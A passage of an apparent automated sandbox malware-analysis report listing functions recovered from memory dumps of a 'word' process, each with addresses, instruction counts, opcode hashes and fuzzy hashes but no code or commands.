                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID: A
                        • API String ID: 0-3554254475
                        • Opcode ID: 17f3b903eed576292d9bce0ca3e63a02cc6336d2bab5098c00eab3f19f86e3ca
                        • Instruction ID: 7f119723de3175826333b34f8084e2848164ed1d0c528189c453bafdca26650a
                        • Opcode Fuzzy Hash: 17f3b903eed576292d9bce0ca3e63a02cc6336d2bab5098c00eab3f19f86e3ca
                        • Instruction Fuzzy Hash: 7131B074808286EFDB21DF65D4806EDBFB1EF06340F5495E9C055DF292DB341A81EB41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F46450 Relevance: .7, Instructions: 679COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522177543.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8b2f14fbdee73beaa26d7143e9675a165d43fc5c1a658d59a2755f8234d197c9
                        • Instruction ID: 0fd50bb54d93b0c7775cc2870b955a4b52aadaeecc28dcaaa6437912e331a372
                        • Opcode Fuzzy Hash: 8b2f14fbdee73beaa26d7143e9675a165d43fc5c1a658d59a2755f8234d197c9
                        • Instruction Fuzzy Hash: BE32D632F012208BEB755B25975463D3AA3FBCA726B154809DE82DB384DF69DC41E783
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F45F30 Relevance: .3, Instructions: 269COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522177543.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4fc891d2fa2d4be00198e5e60f7ec6884a2363197a30216b43cd035d2fdcc816
                        • Instruction ID: 793f417bdbf5ebddd3caec543c4eb1fb915f297b5268921d30403901e7fc6f1f
                        • Opcode Fuzzy Hash: 4fc891d2fa2d4be00198e5e60f7ec6884a2363197a30216b43cd035d2fdcc816
                        • Instruction Fuzzy Hash: 22811F31F041329BEA7216394B1633E69D6EBC6F35B25902ADD03DB384DE65CC41A7A3
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B4B90 Relevance: .2, Instructions: 216COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0594e4015ae92e9ef266ae61762e93d7435582b8cce9f30e30fb7c5825b7bfbe
                        • Instruction ID: 4855b1ca7639ac900d32a792902faa47a7f076b3caf7c63584e774be001bbe56
                        • Opcode Fuzzy Hash: 0594e4015ae92e9ef266ae61762e93d7435582b8cce9f30e30fb7c5825b7bfbe
                        • Instruction Fuzzy Hash: E281AC387006049FD714EB68C465BAAB7E6EF88314F15C16DE50ADB392CB34EC45CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028BB920 Relevance: .2, Instructions: 207COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6ab758613994bd019db7f4b58dce7d4a9ea8613910ece2e8fcdff44a3f680b8d
                        • Instruction ID: 0951df5f7878afbd4e812be01ef6b4f861ce9848e0d2c3fcb229a5698c001a37
                        • Opcode Fuzzy Hash: 6ab758613994bd019db7f4b58dce7d4a9ea8613910ece2e8fcdff44a3f680b8d
                        • Instruction Fuzzy Hash: 3D71D138B04209DFD716CA59D458BEB77A6EF8871AF14802CED06D7388DB34AC81CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B48A0 Relevance: .2, Instructions: 182COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 74205e44b2492baf4c727b01a91c17e171354d2ab3e6bb9f55085628c7cd036f
                        • Instruction ID: 5bcf1ab084c36e7002dfd0d6e68cd0aea046d61e7e4cd0aba6369ed967121299
                        • Opcode Fuzzy Hash: 74205e44b2492baf4c727b01a91c17e171354d2ab3e6bb9f55085628c7cd036f
                        • Instruction Fuzzy Hash: 5261563A6041409FCB068FA4C954E997BB2FF4D314B0A80A8E2069F272CB36DC65EB51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B9FB0 Relevance: .2, Instructions: 179COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 53c4ada35ada51068d05d28b247712505ac7e8fca97c6c0eff51106641d55eda
                        • Instruction ID: dca2b706227089fb2f87422fbdc4087b71d3770a4498e302560d5a99a2e7a43d
                        • Opcode Fuzzy Hash: 53c4ada35ada51068d05d28b247712505ac7e8fca97c6c0eff51106641d55eda
                        • Instruction Fuzzy Hash: C971683CA04208CFDB19CB94D544BEEB7B6EF88308F208169D506EB794DB75AD46CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028BB910 Relevance: .2, Instructions: 166COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4c38ccf970723cd76480954ae1a3a61a82c52e46df7365d620b987cd7c1e7824
                        • Instruction ID: fe1a954dab4c86f2554c974402a17beeb3ca8e754ad4d17bf6515992d9e75e34
                        • Opcode Fuzzy Hash: 4c38ccf970723cd76480954ae1a3a61a82c52e46df7365d620b987cd7c1e7824
                        • Instruction Fuzzy Hash: 9B51A03CB04109DFD7168A59E498BEA7BB2EF8831AF14842DDC16D7794DB349C85CB81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B9FA0 Relevance: .2, Instructions: 166COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: da37944c25752edf688f59aa15b546edf49e46b659a2d909da7b476fa9979562
                        • Instruction ID: 947d113c43fa195385871dfecadcb82d96ed5105f5c532168439d6dd9a6969f8
                        • Opcode Fuzzy Hash: da37944c25752edf688f59aa15b546edf49e46b659a2d909da7b476fa9979562
                        • Instruction Fuzzy Hash: 1661983CA04208CFDB15CB94D544BEEB3B6EF88308F248169E506EB794DB75AD46CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B48D0 Relevance: .2, Instructions: 164COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 838a827c8c371a73df756959e125e339b159455f5464285f6f75c6dc3c4c698c
                        • Instruction ID: e2400664818454b392058b0df0c24a8ecb43b35d896a3d513e66d9e184dfecce
                        • Opcode Fuzzy Hash: 838a827c8c371a73df756959e125e339b159455f5464285f6f75c6dc3c4c698c
                        • Instruction Fuzzy Hash: 46513A7A600104EFCB069F94C955E997BB2FF4C314B0680A8E60A9F376DB36DC61EB51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028BA23B Relevance: .2, Instructions: 153COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8ed0ae5814382fe8ded867eb5f2bc978b287c9919ac074b2b7a1e22dd221320b
                        • Instruction ID: ed99a07896fabc522902f483343b0fcb301d8cc64d08bb3e7eed86567a384b92
                        • Opcode Fuzzy Hash: 8ed0ae5814382fe8ded867eb5f2bc978b287c9919ac074b2b7a1e22dd221320b
                        • Instruction Fuzzy Hash: 3151673CA04208CFCB15CB94D584BEEB3B6EF48308F248169E506EB795DB75AC46CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C6EC10 Relevance: .1, Instructions: 136COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 15061f5b753f7d6d4d2b09e35d17a4f67d2b13dcd24f86adde06a8c0f5b60ed1
                        • Instruction ID: e4ea2929e1ed9cc9498836010076a58986e5e2b011a88232a9c62358d8ea3208
                        • Opcode Fuzzy Hash: 15061f5b753f7d6d4d2b09e35d17a4f67d2b13dcd24f86adde06a8c0f5b60ed1
                        • Instruction Fuzzy Hash: 6641D339A04400DFD720DB6AD988BAAB7F2EF84311F2585B7D51ACB660D770AD40CB80
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B4B8F Relevance: .1, Instructions: 125COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 17f47c623d795c2ae914206d36a2bfdf77d7486f270a606a2ed111a02414d08d
                        • Instruction ID: 8fc1ee4e4e841a676ce2ada32693252215b6c673c95258f8c1cfad6dcfeb08a2
                        • Opcode Fuzzy Hash: 17f47c623d795c2ae914206d36a2bfdf77d7486f270a606a2ed111a02414d08d
                        • Instruction Fuzzy Hash: B4518B38A006008FCB15DF69D5A4A99B7F6FF88314B15C56DD41AEB3A2DB30ED45CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F47020 Relevance: .1, Instructions: 123COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522177543.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2fbd556b959402df4854a8387784d24aa4a899ebe9c549b9de19e7b9b945c70d
                        • Instruction ID: 6c7341e74c10c4372d960804d09665665ed59927cb26331e35f4e4291c11127a
                        • Opcode Fuzzy Hash: 2fbd556b959402df4854a8387784d24aa4a899ebe9c549b9de19e7b9b945c70d
                        • Instruction Fuzzy Hash: B631E531F197215BAA367329162223E29978BC4B69714926DCC03FF344CF69AC4363D2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B4B8A Relevance: .1, Instructions: 116COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 44a8dc8f1e74f4f2c50900dd2a266601030c61803af90607388f3d4176ec9b87
                        • Instruction ID: edd61a3c35e6a3b19b2921260c89e82197a4cdc776e7fa5769ae43e6fffd6f54
                        • Opcode Fuzzy Hash: 44a8dc8f1e74f4f2c50900dd2a266601030c61803af90607388f3d4176ec9b87
                        • Instruction Fuzzy Hash: 434188386006008FCB15DF68D5A4A99B7F2FF88314B55C5ADD41AEB3A2DB30ED45CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B8673 Relevance: .1, Instructions: 110COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 188934dd13082ea9dfdbd11dc6548f2cc4cbd2791327a39cc37a0d3ff088780e
                        • Instruction ID: 637c1d90a2493e3c9053d19edf70da0b001e4008dd247e50d61edb3bc476f64f
                        • Opcode Fuzzy Hash: 188934dd13082ea9dfdbd11dc6548f2cc4cbd2791327a39cc37a0d3ff088780e
                        • Instruction Fuzzy Hash: A941D438A04148DBDB15DF68D858FEB77AAEF88315F208128E516DB786CB358D45CB81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B8680 Relevance: .1, Instructions: 107COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a580acbf5bdd28edc6bb4859b33d2afeede97c23bda674932fdc27e54f6f7a99
                        • Instruction ID: cbbea84f15557fa44ab45007c1c73346ba38adf7354b82f922b129837fe35a7d
                        • Opcode Fuzzy Hash: a580acbf5bdd28edc6bb4859b33d2afeede97c23bda674932fdc27e54f6f7a99
                        • Instruction Fuzzy Hash: 2041CF78A0410CDBDB15DFA8D858FEB77AAEF88315F208128E516DB786CB359D40CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B1570 Relevance: .1, Instructions: 105COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5502eec4b2e28bfcfa05591fbc9ab24bc9c1b99d68fa98b03bba82723a834d59
                        • Instruction ID: 672dc273991f7b2c9f6930eca4a1def513e92d07118499f487369cf7314a2917
                        • Opcode Fuzzy Hash: 5502eec4b2e28bfcfa05591fbc9ab24bc9c1b99d68fa98b03bba82723a834d59
                        • Instruction Fuzzy Hash: A731B37D908288DFCB13DFA49469AE97FB1AF06218B1481DAD48DCF363E6318546CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B3F23 Relevance: .1, Instructions: 101COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f967dbf3b71594d9fe11de6e15334d894356d08300bdad6860af702fd1ba93c1
                        • Instruction ID: d635020f4b41542917b2236558a43c9371ec4a0baf2bbccb5437f4c5919f0f78
                        • Opcode Fuzzy Hash: f967dbf3b71594d9fe11de6e15334d894356d08300bdad6860af702fd1ba93c1
                        • Instruction Fuzzy Hash: 8731E5B03041449FDB40EB68E4557AF7BFAEB88304F10846DE10ACB78BCA799D46C791
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028BA758 Relevance: .1, Instructions: 100COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2608cc1f9dacac76ee1d8a13a38938b34011e60b797a1f3c379b22a27c9814cd
                        • Instruction ID: ac5c1ae4ec5e408f91dbfa867968fac4f2feb1ce6045c70f0888d06bacfd67a2
                        • Opcode Fuzzy Hash: 2608cc1f9dacac76ee1d8a13a38938b34011e60b797a1f3c379b22a27c9814cd
                        • Instruction Fuzzy Hash: 4731287CB081088BDB168A59D454BEB77BAEB88705F10802AE945DB785CB79CC41DBD1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C6A60F Relevance: .1, Instructions: 99COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 79330533c3de89e02c02d6d01fb22d9dcc29ee95b0b681d3db6dddfa4139b5dd
                        • Instruction ID: 9dd47dd1907af0821b2e871361b294db641e9e5fc7a4f9337c44bb5ea0e83ac3
                        • Opcode Fuzzy Hash: 79330533c3de89e02c02d6d01fb22d9dcc29ee95b0b681d3db6dddfa4139b5dd
                        • Instruction Fuzzy Hash: 8F314630B085089FDB21DBA4D6847AD77B6EB84301F15416AE612EB290EF3ACE558F52
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028BA74B Relevance: .1, Instructions: 98COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: afb3239fc1fe50bee892acf5fd265dceb13b24230f1da0ee1d2f9a66fffb4a87
                        • Instruction ID: c67b8e453c373d9a65ed338d21e8d44859a0729264f1224e01616b2e03969915
                        • Opcode Fuzzy Hash: afb3239fc1fe50bee892acf5fd265dceb13b24230f1da0ee1d2f9a66fffb4a87
                        • Instruction Fuzzy Hash: A131387CB081088BDB168A59D454BEB7BBAEB88705F10803AE941DBB85CB79CC41CBD1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B540F Relevance: .1, Instructions: 98COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 46f420513ee77d9062d43884ce5bac930e6782fa18e0727eea5225498e4f701e
                        • Instruction ID: e879dd2d952959de4cae89698e5d456b758d8e4b018acb09ec359157e351a674
                        • Opcode Fuzzy Hash: 46f420513ee77d9062d43884ce5bac930e6782fa18e0727eea5225498e4f701e
                        • Instruction Fuzzy Hash: B3412238604208CFDB15CB64C598BADB7F1FF4A704F5981A9E506EB3A1D778AD81CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C60707 Relevance: .1, Instructions: 90COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b3d577fa0a50f1e7284edabeaef66ad76faa2fe0c6d545c1537385164de16469
                        • Instruction ID: 63a8171b66d870cfd6aba3a0993f62b37c28963528caf5d1a530738a7143b5e9
                        • Opcode Fuzzy Hash: b3d577fa0a50f1e7284edabeaef66ad76faa2fe0c6d545c1537385164de16469
                        • Instruction Fuzzy Hash: C83103B4D09209CFCB14DFA6C4846EEBBF5BF4A300F2090AAC408B7251D7346A81CFA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B6D1D Relevance: .1, Instructions: 89COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e0f5bacd6b2431479cf9a3f58fe1244c55b3a9e4255b949d8b44b4e6ebcd8973
                        • Instruction ID: c388560d5767f89f80d30bdb3e6265d87bf16f163a6774b27b3e71f630526899
                        • Opcode Fuzzy Hash: e0f5bacd6b2431479cf9a3f58fe1244c55b3a9e4255b949d8b44b4e6ebcd8973
                        • Instruction Fuzzy Hash: EF31D1396081289FDB16AB74D4547EDB7AAEF84205F04456AEA06CB394FF32D890C791
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C6FE30 Relevance: .1, Instructions: 80COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: adaa8ccd9f26c9b9545fee82f06ce1eaa3a126809e99a5a132ea8a9fd6040ab1
                        • Instruction ID: 7092b6f2825aaa0436c5aaaef760af7db5111808a2342ac846c1390ad93c7219
                        • Opcode Fuzzy Hash: adaa8ccd9f26c9b9545fee82f06ce1eaa3a126809e99a5a132ea8a9fd6040ab1
                        • Instruction Fuzzy Hash: A2316B71A002059FCB51EFA4E885AAF7BB6FB88301B10813AE606D7294EE358C459BD1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C60628 Relevance: .1, Instructions: 76COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 099f6c26e538e75f90a0e628234e10e51c69f33cda8b4f99ba3ae30d31a92202
                        • Instruction ID: ffcf0a8e890c3531dcd3826b0c4f808b93d7d8de87c3f584513ecc323308a73a
                        • Opcode Fuzzy Hash: 099f6c26e538e75f90a0e628234e10e51c69f33cda8b4f99ba3ae30d31a92202
                        • Instruction Fuzzy Hash: 6F215534908209CFCB14DFA5C4806EEBBF5FB8A304F208465E809BB261DB309A54CF60
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C6AAEE Relevance: .1, Instructions: 76COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b044e503ae8093db48b9161dc24916547b02e3fe8a4712424d8aa47adb679acf
                        • Instruction ID: c07c8c49601feab701408ca18fa4ab2752b024e3e021b0c8cb0aed7568e2629f
                        • Opcode Fuzzy Hash: b044e503ae8093db48b9161dc24916547b02e3fe8a4712424d8aa47adb679acf
                        • Instruction Fuzzy Hash: 2821ED307085048FCB25DBA5C5803AD77F6EF85300F2441AAE206EB290EF3ACD528B52
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C6BC80 Relevance: .1, Instructions: 71COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a413e77a2b24fb6f44c68c0b534ca5186c9a26327e2b978bd36f1755a634e808
                        • Instruction ID: ffa5e96e65c000668c7fe3b2b925f53845c21faf7947c18987fa2bf051b9bf58
                        • Opcode Fuzzy Hash: a413e77a2b24fb6f44c68c0b534ca5186c9a26327e2b978bd36f1755a634e808
                        • Instruction Fuzzy Hash: AF215974D0420AEFEB60DFA6D580BADB7B1FB44340F6099A9C416EB290DB745E80DF40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C60638 Relevance: .1, Instructions: 70COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 17c41449e7c5bb3f0d60b044aaa719d929244d62070a2ac1a7aef35dd458b49f
                        • Instruction ID: a41ad15a9bcd0c7c78c64758da33cc94f06701aabc4641bd224c66ae4ce54a73
                        • Opcode Fuzzy Hash: 17c41449e7c5bb3f0d60b044aaa719d929244d62070a2ac1a7aef35dd458b49f
                        • Instruction Fuzzy Hash: 6A215774D08109CFCB14DFA5C5806EEBBF9FB89304F208469E909BB260DB319A54CF61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B3710 Relevance: .1, Instructions: 63COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0103ac487450d9c733a9083fe28fd8553eebe722d17bbe0a6bb23b8d744f7096
                        • Instruction ID: 005eb38c77b536df42b85c612f099288e7bea2353c2d2f601024e7b00f6a756e
                        • Opcode Fuzzy Hash: 0103ac487450d9c733a9083fe28fd8553eebe722d17bbe0a6bb23b8d744f7096
                        • Instruction Fuzzy Hash: D021FD786041848FD316DF64D519BEA7BB2AF89310F2881F9D00AEBB91CB795C41CBA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B3A50 Relevance: .1, Instructions: 60COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 42772654a44545bed43739cd62f989de5c9209d86dd54580474e06597afa2bf7
                        • Instruction ID: 0638a0b24482efad6283e8b27fed918605664b9e0173b0f8bc3e8dfd35c0f063
                        • Opcode Fuzzy Hash: 42772654a44545bed43739cd62f989de5c9209d86dd54580474e06597afa2bf7
                        • Instruction Fuzzy Hash: 8721E138D49A84AFC706DFA4D1406DCBFB1EF47304F24A5DAC015DB3A2D6381986DB41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B8AF0 Relevance: .1, Instructions: 57COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4b8f4185d521f32cb195be0678e30806198f0e012e4dcebe95ad5ca08226e05b
                        • Instruction ID: d40e268c2a49ced1b03b2f59862868769a331faee106a9f8b703651d8c3483e4
                        • Opcode Fuzzy Hash: 4b8f4185d521f32cb195be0678e30806198f0e012e4dcebe95ad5ca08226e05b
